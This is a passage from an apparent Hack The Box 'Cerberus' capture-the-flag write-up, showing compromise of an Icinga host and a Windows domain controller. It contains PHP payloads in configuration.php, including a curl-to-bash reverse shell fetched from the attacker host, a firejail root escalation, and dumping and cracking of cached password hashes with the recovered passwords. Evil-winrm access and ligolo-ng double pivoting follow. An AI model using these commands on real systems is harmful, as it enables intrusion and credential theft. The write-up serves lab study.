MY28yjoNXCVwGX2I961prSM1wFnlrB/m33aibomrSJfwyZLGa0bclR9Jk3AOB7Oc
PVcuvBQl8LoGuDwdNnJJyp2QuqSiYVQEXakOgM92R3ECgcABfQ1yfgcn6GgPPLLm
aGbusdFQrnHEqLIaZI7cCbDFzCG7duiFXcrotEtNs/9jPK3mUu5Icgvie2G9bu0A
DJsLvO44lKYwV/LWRQlcXxWWSq+NHJBww5whDxVNPdh1I1qRFMlj/3/GhQOX9ZD9
lwGMsL6jao5wTdwRqSKg5ewa4Gt6X8ZmqzoP2AoK+PwnoCjJDH3bA+fAVzXQvHc0
gd2qaDYmm5ZwzWIAaDR7VlsKtO8aUHZwnXWQNBj6aVu0TdECgcEAzWIFC2Z0cAuK
Vy7SirjVP/aTefLi42Pv5xb+WGRCod6pOdJIneeA60yp1Z14n2kxciG0msm2r/pW
1k9BnoDbg4grkmUWpZmXuq8UIs7Kpv/tA5Wfvr4g9q9vV/7LHA9b00Tv6iReKY3R
Ldb0QjruVXmRPP9FvfyEVvNNQMsLi1ATTs89sp3gAUYNNQ8Cg4NdM6hW/psyOe2Z
CSFjOKCS/bMr2dFnKw+XeMPkqB66ileunx8nPFdIQVFiF62vSxEa
-----END RSA PRIVATE KEY-----Now let’s try to run a PHP cmd
(I was not able to make it work, shoutout to 0xdf and ippsec because of there writeup i was able to make it work)
For that, we will use configuration.php
<?php
system("ping -c 1 10.10.16.7");
/*
-----BEGIN RSA PRIVATE KEY-----
MIIG4wIBAAKCAYEAueKqGxn1boYQ7hLQ21rQKrVwRbQYYZieX7I4hbN4PWyGYl7g
C8uSLG8NoSLMtMEdIuq0+0rMydOokCv3XuFMwcZcxgjZn7Hco+YuOG8PVntKvSPE
LkqTezj7ty2fyubqhYYbS+guXS77kqITn9JE/tpou695eZsEwbUPPNtHbf94+aZY
CcISbWLwhUXm9cevRhzZAAFgSUB8hBv+cGNAhtiHbghAZRf7FEawbDEfJjgzut39
jAlzzeGPMvx7f85vGL7X2x2lcguj3ZyL9UUlXYOQHnz19NiZyxR9tI1oAJBljl68
I2J72kL1W1TGZ9kh77qOpPWVQkobDgxEK4TwQSBgNSrdVlwNGEodBW2329jFGxMf
NxW0gNoyjfq+typZKPtwCgNluGBwQBPmfoCQRfeJup1H4h0xmtPNjC7VJs81VVAF
RU72uwzqQ/E0psHAocKKnFLgIFZzJ2qsdyAGyhCxdI2uj9gwUE5WkL2xaOQ0Rp/D
LGk8cU209g2Wtj/VAgMBAAECggGALQtvl8YsWrZbu2ltWb6Rs8vIc2evQdU7SarV
NhcVw+K81PEzP0B7QU+/AIV/kCy83AV+ymdnpV/oWNmCpigYEtv4BthFrkRqWIBS
woOtNpKFe7yDUYlqYEGgg9TnREK9YZJsInKW66dTOMcUVNYeOJjiKNsep3iIiE1R
LjjgABiYrvyfmGvCTeYcLVuRWo1jXKzoa+8pb07Ubaof+AmhLRwjA2e1/Rl400LH
BUzJBNi5NmcNhkYTHTiz3BHhdojmKs13KhAc2w5aZnQ38u2TAiEjPJDtJcL5F+K1
VaJylR2vN0cjzEpXXbf54qcHnks/m+PR/k/ze0s1Cado+oxxW4AJsm4iYXC6wxfS
u5w/qSZBSAaZYTyhtOFlyHHLyROZYneRpDqX9dlebuk1iqKlR+jSAtM9npi1Qivb
TYj3UM6WXz82YWbixd1QoexR6y/BoFpgeewS2QKAfKPqc5mV/tAilu/rI7oEcNIf
uYVLBxA6BIIdMjJDNxXed53wdhERAoHBAOLVUgQIkJVCAauhqVbaReUGTgEREWMI
AgasMDNB4az5QxYpUBppLMf/h5w1QlGJpe+eQeMOxq9buzBwQlx38Qag17L9V6EJ
Q0ejHPn+gtPGdmCLQMM5nSt/TL/q9Gc7xr03zjR/WYtwDfoCcmaFCqOdsCCn3VJ4
v9ezIsla0aEZDDVK34YdTc+B7uonfdbAr/dlRR/5VWD2NxNBIFK3KgGZfSj8q85P
15CxSYnvvBoggD1up0Giv95d5QdxQO/LxQKBwQDRyXYdcKqhnfyAJGk2HneFF62x
sPhZcUeeXkfl4IPY2/TEWBP4dxFXGMdLCfWrQQnpVarfsxtEadNN/glYa2g9pbB0
F4vVIjuUBmcs1q/UG3C/ppD43uix8MiTExpqs1ARQt/zRuUIsVXegVlF6psVogn/
joJmkHI/bJ143vguiLqE0aGNSIXRz32HcpT7N9SfQgMIIFpsb0tk5zGIkonI4O0u
ptbsokz1p01ftDwK/1g5BETcKNaGJPxtMQ/HlNECgcAxRd1W+vVNNtVeDvPV5fwg
z8nJ+YcpV+f4wxaFS95V0J9+BONdmVMc7qjqibcqNxhQgLQXOnJ2TRrQXtJLe9Jj
ejTgsJ+EX5q5yPjWZS7OCeJU/mrG/ZDijfiCB+unMRjuqVylkrRE0cZ3dGidVHEH
MY28yjoNXCVwGX2I961prSM1wFnlrB/m33aibomrSJfwyZLGa0bclR9Jk3AOB7Oc
PVcuvBQl8LoGuDwdNnJJyp2QuqSiYVQEXakOgM92R3ECgcABfQ1yfgcn6GgPPLLm
aGbusdFQrnHEqLIaZI7cCbDFzCG7duiFXcrotEtNs/9jPK3mUu5Icgvie2G9bu0A
DJsLvO44lKYwV/LWRQlcXxWWSq+NHJBww5whDxVNPdh1I1qRFMlj/3/GhQOX9ZD9
lwGMsL6jao5wTdwRqSKg5ewa4Gt6X8ZmqzoP2AoK+PwnoCjJDH3bA+fAVzXQvHc0
gd2qaDYmm5ZwzWIAaDR7VlsKtO8aUHZwnXWQNBj6aVu0TdECgcEAzWIFC2Z0cAuK
Vy7SirjVP/aTefLi42Pv5xb+WGRCod6pOdJIneeA60yp1Z14n2kxciG0msm2r/pW
1k9BnoDbg4grkmUWpZmXuq8UIs7Kpv/tA5Wfvr4g9q9vV/7LHA9b00Tv6iReKY3R
Ldb0QjruVXmRPP9FvfyEVvNNQMsLi1ATTs89sp3gAUYNNQ8Cg4NdM6hW/psyOe2Z
CSFjOKCS/bMr2dFnKw+XeMPkqB66ileunx8nPFdIQVFiF62vSxEa
-----END RSA PRIVATE KEY-----
*/nd then we will change the module path to
then when we visit the module and click on test module which we have created we can see the response
Now it’s time to get revshell
<?php
system("curl 10.10.16.7/shell|bash");
/*
-----BEGIN RSA PRIVATE KEY-----
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
-----END RSA PRIVATE KEY-----
*/and when we click on module test2 we will get the shell
└─$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (<http://0.0.0.0:80/>) ...
10.10.11.205 - - [13/Aug/2025 17:04:33] "GET /shell HTTP/1.1" 200 -
└─$ nc -nlvp 1234
listening on [any] 1234 ...
connect to [10.10.16.7] from (UNKNOWN) [10.10.11.205] 49804
bash: cannot set terminal process group (611): Inappropriate ioctl for device
bash: no job control in this shell
www-data@icinga:/usr/share/icingaweb2/public$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data),121(icingaweb2) Shell as root on Icinga
When looking for SUID, we found something interseting firejail
www-data@icinga:/home$ find / -perm /4000 -exec ls -l {} \\; 2>/dev/null
find / -perm /4000 -exec ls -l {} \\; 2>/dev/null
-rwsr-xr-x 1 root root 14488 Feb 4 2021 /usr/sbin/ccreds_chkpwd
-rwsr-xr-x 1 root root 47480 Feb 21 2022 /usr/bin/mount
-rwsr-xr-x 1 root root 232408 Feb 14 2022 /usr/bin/sudo
-rwsr-xr-x 1 root root 474496 Jan 19 2022 /usr/bin/firejail
-rwsr-xr-x 1 root root 72712 Mar 14 2022 /usr/bin/chfn
-rwsr-xr-x 1 root root 35200 Mar 23 2022 /usr/bin/fusermount3
-rwsr-xr-x 1 root root 40496 Mar 14 2022 /usr/bin/newgrp
-rwsr-xr-x 1 root root 59976 Mar 14 2022 /usr/bin/passwd
-rwsr-xr-x 1 root root 72072 Mar 14 2022 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 47400 Feb 21 2022 /usr/bin/ksu
-rwsr-xr-x 1 root root 30872 Feb 26 2022 /usr/bin/pkexec
-rwsr-xr-x 1 root root 44808 Mar 14 2022 /usr/bin/chsh
-rwsr-xr-x 1 root root 55672 Feb 21 2022 /usr/bin/su
-rwsr-xr-x 1 root root 35192 Feb 21 2022 /usr/bin/umount
-rwsr-xr-- 1 root messagebus 35112 Apr 1 2022 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 338536 Nov 23 2022 /usr/lib/openssh/ssh-keysignFirejail escape
On looking for the vulnerability for firejail We found this
www-data@icinga:/tmp$ python3 firejail.py
You can now run 'firejail --join=3244' in another terminal to obtain a shell where 'sudo su -' should grant you a root shell.Now we have to get another shell and run this, and we are root
www-data@icinga:/tmp$ firejail --join=3270
changing root to /proc/3270/root
Warning: cleaning all supplementary groups
Child process initialized in 15.57 ms
www-data@icinga:/tmp$ sudo su -
www-data is not in the sudoers file. This incident will be reported.
www-data@icinga:/tmp$ su -
root@icinga:~#
Shell as Matthew on Cerberus
We have seen the internal IP for DC We can confirm this by simple ping sweep
for i in {1..255}; do (ping -c 1 172.16.22.${i} | grep "bytes from" &); done
64 bytes from 172.16.22.1: icmp_seq=1 ttl=128 time=0.595 ms
64 bytes from 172.16.22.2: icmp_seq=1 ttl=64 time=0.015 ms
ping: Do you want to ping broadcast? Then -b. If not, check your local firewall rules
root@icinga:~/cleanup# Let’s copy nmap and run it
root@icinga:/tmp# ./np -p- --min-rate 10000 172.16.22.1
Starting Nmap 6.49BETA1 ( <http://nmap.org> ) at 2025-08-13 14:07 UTC
Unable to find nmap-services! Resorting to /etc/services
Cannot find nmap-payloads. UDP payloads are disabled.
Nmap scan report for DC.cerberus.local (172.16.22.1)
Cannot find nmap-mac-prefixes: Ethernet vendor correlation will not be performed
Host is up (0.00067s latency).
Not shown: 65534 filtered ports
PORT STATE SERVICE
5985/tcp open unknown
MAC Address: 00:15:5D:5F:E8:00 (Unknown)
Nmap done: 1 IP address (1 host up) scanned in 13.50 seconds
root@icinga:/tmp# Sweet WinRM is open
sssd
root@icinga:/tmp# ps -ef --forest
UID PID PPID C STIME TTY TIME CMD
root 1101 1 0 09:45 tty1 00:00:00 /sbin/agetty -o -p -- \\u --n
root 1065 1 0 09:45 ? 00:00:00 /lib/systemd/systemd-logind
root 1063 1 0 09:45 ? 00:00:00 /usr/sbin/cron -f -P
<--SNIP-->
<--SNIP-->
www-data 948 611 0 09:45 ? 00:00:00 \\_ php-fpm: pool www
root 560 1 0 09:45 ? 00:00:00 /usr/sbin/sssd -i --logger=f
root 794 560 0 09:45 ? 00:00:00 \\_ /usr/libexec/sssd/sssd_b
root 899 560 0 09:45 ? 00:00:00 \\_ /usr/libexec/sssd/sssd_n
root 901 560 0 09:45 ? 00:00:00 \\_ /usr/libexec/sssd/sssd_p
root 558 1 0 09:45 ? 00:00:00 /usr/bin/python3 /usr/bin/ne
<--SNIP-->
<--SNIP-->SSSD (System Security Services Daemon) provides a set of daemons to manage access to remote directory services and authentication mechanisms.
There are a few files in the db directory. Running strings on cache_cerberus.local.ldb returns a bunch of data, including references to the matthew user and some hashes:
root@icinga:/tmp# ls -la /var/lib/sss/
total 40
drwxr-xr-x 10 root root 4096 Jan 22 2023 .
drwxr-xr-x 38 root root 4096 Jan 29 2023 ..
drwx------ 2 root root 4096 Mar 2 2023 db
drwxr-x--x 2 root root 4096 Oct 4 2022 deskprofile
drwxr-xr-x 2 root root 4096 Oct 4 2022 gpo_cache
drwx------ 2 root root 4096 Oct 4 2022 keytabs
drwxrwxr-x 2 root root 4096 Aug 13 09:45 mc
drwxr-xr-x 3 root root 4096 Aug 13 09:45 pipes
drwxr-xr-x 3 root root 4096 Aug 13 13:51 pubconf
drwx------ 2 root root 4096 Jan 22 2023 secrets
root@icinga:/tmp# strings /var/lib/sss/db/
cache_cerberus.local.ldb sssd.ldb
ccache_CERBERUS.LOCAL timestamps_cerberus.local.ldb
config.ldb
root@icinga:/tmp# strings /var/lib/sss/db/cache_cerberus.local.ldb
<--SNIP-->
<--SNIP-->
name
matthew@cerberus.local
objectCategory
user
uidNumber
1000
isPosix
TRUE
lastUpdate
1677672476
dataExpireTimestamp
initgrExpireTimestamp
cachedPassword
$6$6LP9gyiXJCovapcy$0qmZTTjp9f2A0e7n4xk0L6ZoeKhhaCNm0VGJnX/Mu608QkliMpIy1FwKZlyUJAZU3FZ3.GQ.4N6bb9pxE3t3T0
cachedPasswordType
lastCachedPasswordChange
1677672476
failedLoginAttempts
<--SNIP-->
<--SNIP-->Let’s crack the hash
└─$ hashcat matthew.hash -m 1800 /home/anurag/stuff/rockyou.txt
<--SNIP-->
<--SNIP-->
$6$6LP9gyiXJCovapcy$0qmZTTjp9f2A0e7n4xk0L6ZoeKhhaCNm0VGJnX/Mu608QkliMpIy1FwKZlyUJAZU3FZ3.GQ.4N6bb9pxE3t3T0:147258369
<--SNIP-->
<--SNIP-->Let’s set up ligolo-ng for pivoting (refer to this)
└─$ sudo ./proxy -selfcert
[sudo] password for anurag:
WARN[0000] Using default selfcert domain 'ligolo', beware of CTI, SOC and IoC!
WARN[0000] Using self-signed certificates
WARN[0000] TLS Certificate fingerprint for ligolo is: B857F3D462BA49E017C3E07C1D91848D2B71319F8CFB9210533C9B6D85F7D8E0
INFO[0000] Listening on 0.0.0.0:11601
__ _ __
/ / (_)___ _____ / /___ ____ ____ _
/ / / / __ `/ __ \\/ / __ \\______/ __ \\/ __ `/
/ /___/ / /_/ / /_/ / / /_/ /_____/ / / / /_/ /
/_____/_/\\__, /\\____/_/\\____/ /_/ /_/\\__, /
/____/ /____/
Made in France ♥ by @Nicocha30!
Version: 0.7.5
ligolo-ng » INFO[0028] Agent joined. id=aa50efd9-2fae-436e-bb4c-a2a1802c0041 name=www-data@icinga remote="10.10.11.205:49812"
ligolo-ng »
ligolo-ng » session
? Specify a session : 1 - www-data@icinga - 10.10.11.205:49812 - aa50efd9-2fae-436e-bb4c-a2a1802c0041
[Agent : www-data@icinga] » ifconfig
┌────────────────────────────────────┐
│ Interface 0 │
├──────────────┬─────────────────────┤
│ Name │ lo │
│ Hardware MAC │ │
│ MTU │ 65536 │
│ Flags │ up|loopback|running │
│ IPv4 Address │ 127.0.0.1/8 │
│ IPv6 Address │ ::1/128 │
└──────────────┴─────────────────────┘
┌───────────────────────────────────────────────┐
│ Interface 1 │
├──────────────┬────────────────────────────────┤
│ Name │ eth0 │
│ Hardware MAC │ 00:15:5d:5f:e8:01 │
│ MTU │ 1500 │
│ Flags │ up|broadcast|multicast|running │
│ IPv4 Address │ 172.16.22.2/28 │
│ IPv6 Address │ fe80::215:5dff:fe5f:e801/64 │
└──────────────┴────────────────────────────────┘
[Agent : www-data@icinga] » interface_create --name ligolo
INFO[0046] Creating a new "ligolo" interface...
INFO[0046] Interface created!
[Agent : www-data@icinga] » interface_add_route --name ligolo --route 172.16.22.0/28
INFO[0058] Route created.
[Agent : www-data@icinga] » start
[Agent : www-data@icinga] » INFO[0068] Starting tunnel to www-data@icinga (aa50efd9-2fae-436e-bb4c-a2a1802c0041)
And we can ping DC
└─$ ping 172.16.22.1
PING 172.16.22.1 (172.16.22.1) 56(84) bytes of data.
64 bytes from 172.16.22.1: icmp_seq=1 ttl=64 time=1123 ms
64 bytes from 172.16.22.1: icmp_seq=2 ttl=64 time=399 ms
^C
--- 172.16.22.1 ping statistics ---
3 packets transmitted, 2 received, 33.3333% packet loss, time 2029ms
rtt min/avg/max/mdev = 399.202/761.326/1123.450/362.124 ms, pipe 2Now we can WinRM and get the user.txt
└─$ evil-winrm -i 172.16.22.1 -u matthew -p 147258369
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: <https://github.com/Hackplayers/evil-winrm#Remote-path-completion>
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\\Users\\matthew\\Documents> cd ..\\Desktop
*Evil-WinRM* PS C:\\Users\\matthew\\Desktop> dir
Directory: C:\\Users\\matthew\\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 8/13/2025 2:45 AM 34 user.txtPrivilege Escalation
Shell as ?
Backup file on ADSelf
We found a backup file in ADSelfService Plus
*Evil-WinRM* PS C:\\Program Files (x86)> dir "ManageEngine\\ADSelfService Plus\\Backup"
Directory: C:\\Program Files (x86)\\ManageEngine\\ADSelfService Plus\\Backup
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 5/16/2025 10:14 PM 636500 250516-221358.ezip
-a---- 2/15/2023 7:16 AM 320225 OfflineBackup_20230214064809.ezip
*Evil-WinRM* PS C:\\Program Files (x86)> Let’s download and analyse
Both files are password protected zip
└─$ file 250516-221358.ezip
250516-221358.ezip: Zip archive data, made by v6.3, extract using at least v5.1, last modified May 16 2025 22:14:06, uncompressed size 82, method=AES Encrypted
┌──(anurag㉿anurag)-[~/htb/Cerberus/loot]
└─$ 7z x OfflineBackup_20230214064809.ezip
7-Zip 24.09 (x64) : Copyright (c) 1999-2024 Igor Pavlov : 2024-11-29
64-bit locale=C.UTF-8 Threads:3 OPEN_MAX:1024, ASM
Scanning the drive for archives:
1 file, 320225 bytes (313 KiB)
Extracting archive: OfflineBackup_20230214064809.ezip
--
Path = OfflineBackup_20230214064809.ezip
Type = 7z
Physical Size = 320225
Headers Size = 8337
Method = LZMA2:3m 7zAES
Solid = +
Blocks = 1
Enter password (will not be echoed):On this show the default password should be Default password: This is the reverse string of the filename. For the filename mentioned above, the password would be: 7451-422180.
Let’s try it out
Since we can list the files on OfflineBackup_20230214064809
─$ 7z l OfflineBackup_20230214064809.ezip
7-Zip 24.09 (x64) : Copyright (c) 1999-2024 Igor Pavlov : 2024-11-29
64-bit locale=C.UTF-8 Threads:3 OPEN_MAX:1024, ASM
Scanning the drive for archives:
1 file, 320225 bytes (313 KiB)
Listing archive: OfflineBackup_20230214064809.ezip
--
Path = OfflineBackup_20230214064809.ezip
Type = 7z
Physical Size = 320225
Headers Size = 8337
Method = LZMA2:3m 7zAES
Solid = +
Blocks = 1
Date Time Attr Size Compressed Name
------------------- ----- ------------ ------------ ------------------------
2023-02-14 20:18:39 ....A 0 0 AAARadiusConfig.txt
2023-02-14 20:18:39 ....A 0 0 AAARememberMeInfo.txt
2023-02-14 20:18:39 ....A 0 0 ADMPDomainGroupRoleMapping.txt
2023-02-14 20:18:40 ....A 0 0 ADSADComputerGeneralDetails.txt
2023-02-14 20:18:40 ....A 0 0 ADSADContactGeneralDetails.txt
2023-02-14 20:18:40 ....A 0 0 ADSADGroupGeneralDetails.txt
2023-02-14 20:18:40 ....A 0 0 ADSADOUGeneralDetails.txt
2023-02-14 20:18:40 ....A 0 0 ADSADSyncAudit.txt
2023-02-14 20:18:40 ....A 0 0 ADSADSyncMultiDCResults.txt
2023-02-14 20:18:44 ....A 0 0 ADSADSyncMultiDCResultsAudit.txt
<--SNIP-->
<--SNIP-->└─$ echo "OfflineBackup_20230214064809" | rev
90846041203202_pukcaBenilffOfound a hash.txt
└─$ cat hash.txt
$2a$12$IkmRrMCQ6KAuzaMTp4DMxeu0XGpLKuXbz2JMbLVG3gCYTg/JPlE9qLet’s crack 'em
└─$ hashcat hash.txt -m 3200 /home/anurag/stuff/rockyou.txt
hashcat (v6.2.6) starting
<--SNIP-->
$2a$12$IkmRrMCQ6KAuzaMTp4DMxeu0XGpLKuXbz2JMbLVG3gCYTg/JPlE9q:spongebob1
<--SNIP-->Now I need to find the user for it. Unfortunately, no user matched the password
After that, I thought to look for open ports
└─$ nmap -sT -p- --min-rate 10000 171.16.22.1 -Pn
Starting Nmap 7.95 ( <https://nmap.org> ) at 2025-08-14 17:56 IST
Nmap scan report for 171.16.22.1
Host is up.
All 65535 scanned ports on 171.16.22.1 are in ignored states.
Not shown: 65535 filtered tcp ports (no-response)
Nmap done: 1 IP address (1 host up) scanned in 143.23 secondsbut strangely, we found all the ports in an ignored state, but we know winrm port is open (maybe the firewall or some filtering is there?)
After doing some digging I found out Why WinRM Works Only via Linux Jump Host (172.16.22.2)
Finding
Windows Firewall inbound rules for WinRM (TCP 5985) explicitly allow connections only from
172.16.22.2/32.The generic Allow Ports rule does allow
172.16.22.1and172.16.22.2, but it does not include port 5985 in itsLocalPortlist.Result:
From attacker host directly → source IP not allowed for WinRM → packet silently dropped (
filteredin Nmap).From Linux jump host (
172.16.22.2) via Ligolo-ng → source IP matches allowed rule → WinRM connection succeeds.
Scripts Used
1. firewall_rule.ps1 – Display all rules with key fields:
netsh advfirewall firewall show rule name=all | Select-String "Rule Name" -Context 0,6 | % {
$c = $_.Context.PostContext
[pscustomobject]@{
'Rule Name' = ($_.Line -split ":\\s*",2)[1]
'Enabled' = ($c[0] -split ":\\s*",2)[1]
'Direction' = ($c[1] -split ":\\s*",2)[1]
'Action' = ($c[2] -split ":\\s*",2)[1]
'Protocol' = ($c[3] -split ":\\s*",2)[1]
'LocalPort' = ($c[4] -split ":\\s*",2)[1]
'RemoteIP' = ($c[5] -split ":\\s*",2)[1]
}
} | ft -AutoSizeOutput excerpt:
Rule Name Enabled Direction Action Protocol LocalPort RemoteIP
--------- ------- --------- ------ -------- --------- --------
Windows Remote Management (HTTP-In) Yes Inbound Allow TCP 5985 172.16.22.2/32
Windows Remote Management (HTTP-In) Yes Inbound Allow TCP 5985 172.16.22.2/32
Allow Ports Yes Inbound Allow TCP 53,80,... 172.16.22.1/32,172.16.22.2/322. Remote_IP_restriction.ps1 – List only rules with RemoteIP restrictions:
netsh advfirewall firewall show rule name=all verbose | Select-String "Rule Name" -Context 0,15 | ForEach-Object {
$c = $_.Context.PostContext
$remoteIP = ($c | Where-Object { $_ -match "^RemoteIP" }) -replace "RemoteIP:\\s*", ""
if ($remoteIP -and $remoteIP -ne "Any") {
[pscustomobject]@{
'Rule Name' = ($_.Line -replace "Rule Name:\\s*", "").Trim()
'RemoteIP' = $remoteIP.Trim()
}
}
} | Format-Table -AutoSizeOutput excerpt:
Rule Name RemoteIP
--------- --------
Windows Remote Management (HTTP-In) 172.16.22.2/32
Windows Remote Management (HTTP-In) 172.16.22.2/32
Allow Ports 172.16.22.1/32,172.16.22.2/323. Detailed check of Allow Ports rule:
netsh advfirewall firewall show rule name="Allow Ports" verboseOutput excerpt:
LocalPort: 53,80,443,88,135,139,389,445,464,593,636,2179,3268,3269,5357,9389,49667-60000
RemoteIP: 172.16.22.1/32,172.16.22.2/32No 5985 in the LocalPort list → rule does not apply to WinRM.
Conclusion
WinRM access is hard restricted to the Linux jump host’s IP (172.16.22.2).
Generic allow rule for
172.16.22.1doesn’t help because 5985 is excluded.Pivoting through
172.16.22.2is the only way to reach WinRM.
Double Pivot to access all ports
We need to put Ligoglo-ng agent on Windows server as well, because right now:
My Kali → Linux pivot (
172.16.22.2) → Windows serverWindows firewall limits WinRM to only
172.16.22.2, so it works, but other ports may be restricted to other IPs orLocalSubnet.From Kali, our Nmap scans are limited to what
172.16.22.2is allowed to see.
So if I double Pivot
[ My Kali ]
↓ (Ligolo)
[ Linux Jump Host: 172.16.22.2 ]
↓ (Ligolo)
[ Windows Server ]
↓
[ Rest of Internal Network ]Double Pivot
*Evil-WinRM* PS C:\\temp> .\\agent.exe -connect 10.10.16.7:11601 -ignore-cert
agent.exe : time="2025-08-14T07:47:04-07:00" level=warning msg="warning, certificate validation disabled"
+ CategoryInfo : NotSpecified: (time="2025-08-1...ation disabled":String) [], RemoteException
+ FullyQualifiedErrorId : NativeCommandError
time="2025-08-14T07:47:04-07:00" level=info msg="Connection established" addr="10.10.16.7:11601"Since Kali already knows 172.16.22.0/28 via first tunnel, but the /32 route to 172.16.22.1 will override it in the routing table.
This forces all DC traffic to go via the second tunnel → direct access from DC’s perspective → bypasses the firewall that blocks your Kali IP.
[Agent : www-data@icinga] » INFO[0044] Agent joined. id=86bb7c5e-1850-45fe-9fb3-4f1e82a11f7f name="CERBERUS\\\\matthew@DC" remote="10.10.11.205:49524"
[Agent : www-data@icinga] »
[Agent : www-data@icinga] » session
? Specify a session : 2 - CERBERUS\\matthew@DC - 10.10.11.205:49524 - 86bb7c5e-1850-45fe-9fb3-4f1e82a11f7f
[Agent : CERBERUS\\matthew@DC] » interface_create --name ligolo1
INFO[0158] Creating a new "ligolo1" interface...
INFO[0158] Interface created!
[Agent : CERBERUS\\matthew@DC] » ifconfig
┌───────────────────────────────────────────────┐
│ Interface 0 │
├──────────────┬────────────────────────────────┤
│ Name │ vEthernet (Switch1) │
│ Hardware MAC │ 00:15:5d:5f:e8:00 │
│ MTU │ 1500 │
│ Flags │ up|broadcast|multicast|running │
│ IPv6 Address │ fe80::e225:edaa:5112:dfc3/64 │
│ IPv4 Address │ 172.16.22.1/28 │
└──────────────┴────────────────────────────────┘
┌─────────────────────────────────────────────────┐
│ Interface 1 │
├──────────────┬──────────────────────────────────┤
│ Name │ Ethernet0 3 │
│ Hardware MAC │ 00:50:56:b0:70:81 │
│ MTU │ 1500 │
│ Flags │ up|broadcast|multicast|running │
│ IPv6 Address │ dead:beef::18/128 │
│ IPv6 Address │ dead:beef::d5b6:1a82:ed83:740/64 │
│ IPv6 Address │ fe80::9aa1:6bb4:769a:899d/64 │
│ IPv4 Address │ 10.10.11.205/24 │
└──────────────┴──────────────────────────────────┘
┌──────────────────────────────────────────────┐
│ Interface 2 │
├──────────────┬───────────────────────────────┤
